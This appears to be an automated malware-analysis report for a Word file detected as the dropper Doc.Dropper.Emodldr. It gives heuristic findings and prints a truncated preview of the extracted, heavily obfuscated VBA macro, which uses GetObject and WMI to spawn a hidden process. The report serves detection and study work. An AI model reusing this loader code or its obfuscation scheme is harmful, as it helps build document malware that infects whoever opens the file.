MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file contains heavily obfuscated VBA macros, including a Document_Open auto-exec loader, indicating malicious intent. The script attempts to use GetObject to download and execute a payload from a suspicious-looking string, which is likely the primary malicious function. ClamAV also detected this as a dropper.
Heuristics 7
-
ClamAV: Doc.Dropper.Emodldr-6755244-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Emodldr-6755244-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 56836 bytes |
SHA-256: a59c596b2846abd4d1ccb7f3ac649426b815e8193119c818e89e581327cb23d6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub TMxvI(VTmBmLb As String, FJtncc As String, vUnvtj As String, HeycP As String, NFizO As String, LRJPkMe As String)
For XBYzeL = 0 To 194
aydux = "SR#J%zQEPkxw_EC_T(c" + "cOkc#wt].kN" + "AzD)T&XjlheCv^m[Ld"
fSlXK = Left("XndQiuD@?uS_WdAe", 4)
aydux = StrReverse("s]nxO$yZ[XYSVz")
mMQNurUb = 1314 + 1697 + 861
JnbMpav = StrReverse("(h)Fw[axEcgkY")
hLxuFYJO = UCase("@&Bi]!Nt&d]DYd")
aydux = "nYA_p#tHc)yALB" + "bPo?jubTZr-]Rcn" + "kPCHzxfFB-!F"
fSlXK = RTrim("yQiYw*)uYfWE")
pSoJTqYE = UCase("FsPS@g$dh)Q")
VGIgt = RTrim("w&BgVR[*gER&XWkyS")
Next XBYzeL
szAzrRUQ = Left("Ukrsi%q.MWn^uXzoodN", 5)
hLxuFYJO = 839 - 1899 - 1879
PDXZIXJ = 270 - 1437 - 723
mMQNurUb = "^NP@lv&[T?" + ".JrX*nR$ipQ*ia" + "Cud]E$VIzE!V?^] hSQI"
JnbMpav = StrReverse("U]NcXFnDUgDn-x")
PDXZIXJ = Space(15)
aydux = Space(2)
Set ruhTFms = GetObject(SjQSOd("wsi%n-mzg]m*tHsU:B\r\w.i\_rEoYo tr\Pc*ijmHvt2#"))
aydux = StrReverse("e^[q!(oYac@cwKI*")
hLxuFYJO = Right("naABfLc!GWqKLMTcuyQl", 2)
JnbMpav = UCase("jms[fiu.H KXbiO*")
JnbMpav = RTrim("#dxytQCNZ_xXs")
FkxmtZv = Space(2)
szAzrRUQ = Space(15)
hLxuFYJO = 1866 + 785 + 988
While Lfqutn < 217
mMQNurUb = LTrim("^vEKi(hCqkHTnjF")
YltcGz = LTrim(" VmJMD?MdSw)NOojX#")
FkxmtZv = "rxOQ)bwzy?nc" + ".(*k GTCq@^^O" + "_p] BvTFq&vu[cJ"
VGIgt = "rUroBw?Pw@fNwmoPidH" + "PH.TXs$OiHWD)FVh [" + "pE_ZbVFjHI[EfgCy&"
fSlXK = "b-m.o*)I$y" + "y YJo-Lbn&RRs.V!" + "tvdK(zWQ!#SiR"
szAzrRUQ = Space(4)
FkxmtZv = Left("YW zjhR@ghkn", 2)
nuKqm = 1215 - 1897 - 1579
pSoJTqYE = Space(13)
mMQNurUb = RTrim("eUxk[V n[XN$$]@A")
Lfqutn = Lfqutn + 1
Wend
Set LFWzZJ = ruhTFms.Get(SjQSOd("W-iunl3&2W_%PTr$oXc.e sTsYS%tNaCrOtMugp."))
fSlXK = LTrim("g#!Kb*)GOCRivdNv*V")
hLxuFYJO = Right("#dFlSDNycb*&Jb", 2)
JnbMpav = 847 + 1305 + 1210
JnbMpav = Space(8)
VGIgt = RTrim("VEeimfQlzqm?gzwddp-q")
hLxuFYJO = Right("Y#FTgC^CB-l#yDHON", 4)
JnbMpav = Space(3)
aydux = "hb%nptVK_eZCd!bOu" + "hWw)cHGNDfZdlqRG@e-" + "GdC$$AiRwaf"
Set USRZu = LFWzZJ.SpawnInstance_
PDXZIXJ = Space(13)
aydux = Right("S!TxaOqV#*.Bo^(", 3)
While FZsTQN < 219
fSlXK = Left("*WeJ)s^tCqObJ]]b", 3)
VGIgt = 1494 - 1152 - 727
szAzrRUQ = 566 + 1282 + 1323
pSoJTqYE = Left("KoJR[%FGz yXalx", 2)
VGIgt = Left("iWC*[_vDi&)MswP", 4)
VGIgt = 423 - 395 - 1994
FZsTQN = FZsTQN + 2
Wend
aydux = UCase("EJye]fYXSBld#S")
YltcGz = UCase("CKWJbrD)kXbr^JzSMm")
fSlXK = 1339 + 1711 + 432
VGIgt = StrReverse("eJT@-(jcww%iEfqDu")
For pZbCrX = 0 To 381
nuKqm = StrReverse("skQL]xHWfa")
hLxuFYJO = UCase("BFlcG%p$Sble")
Next pZbCrX
USRZu.ShowWindow = 0
JnbMpav = StrReverse("t?ZE#Qo?El_v)YVXB")
While LJGjUG < 315
fSlXK = StrReverse("wLQI$dAX#G^Ny@XI#F!")
PDXZIXJ = Left("sHvOBuzh(tEaZ]kZgd%", 4)
hLxuFYJO = "LsTqVtpFgSMNMQ*" + "@PmeGX?a%FmmBLvMGZ" + "Vvai RRLLijbT-QVEq"
FkxmtZv = Left("evi_bPOo$wp", 3)
fSlXK = UCase("$OQ#lcr&NFkHj[zH([Q")
LJGjUG = LJGjUG + 2
Wend
While djvMAp < 199
hLxuFYJO = 1790 + 1226 + 744
mMQNurUb = 360 + 1603 + 529
szAzrRUQ = Right("dsi*oY?&CcM", 3)
djvMAp = djvMAp + 3
Wend
hLxuFYJO = RTrim("zyS!LesQhKJy#C^")
aydux = 179 - 459 - 218
aydux = Space(1)
JnbMpav = UCase("VYsI*zly^#QMCXyi")
For PQQMri = 0 To 284
mMQNurUb = UCase("ZnoFh#KdUsefcq%")
YltcGz = LTrim("()Ol[JJ.n.[?u@")
Next PQ
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.